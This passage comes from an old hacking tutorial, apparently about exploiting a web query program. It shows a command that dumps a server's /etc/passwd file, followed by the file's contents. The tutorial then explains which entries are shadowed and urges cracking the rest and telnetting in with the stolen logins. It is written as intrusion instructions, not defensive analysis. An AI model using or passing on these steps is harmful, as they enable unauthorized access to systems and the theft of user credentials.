    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:x:0:1:0000-Admin(0000):/:/bin/sh
    daemon:x:1:1:0000-Admin(0000):/:
    bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh
    sys:x:3:3:0000-Admin(0000):/:
    adm:x:4:4:0000-Admin(0000):/var/adm:
    wnn:x:5:5:0000-Admin(0000):/var/adm:
    news:x:6:6:0000-Admin(0000):/usr/lib/news:
    lp:x:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:x:0:0:mail daemon user:/:
    uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:uid no b

    (notice the x). If you don’t know what this means, it means the password
    file is shadowed, and you cannot work out the passwords for a shadowed
    password file, so you’re in bad luck. I would recommend trying the ftp
    hack prior to this for the best results.

    If some but not all logins have a * in them then it’s ok, it’s worth while
    getting the ones which aren’t shadowed, hey a shell is a shell!!!

    If you want to use your newly acquired shells then telnet to the site and
    put in the login and the password (remember you have to crack the password
    file first explained at the top).


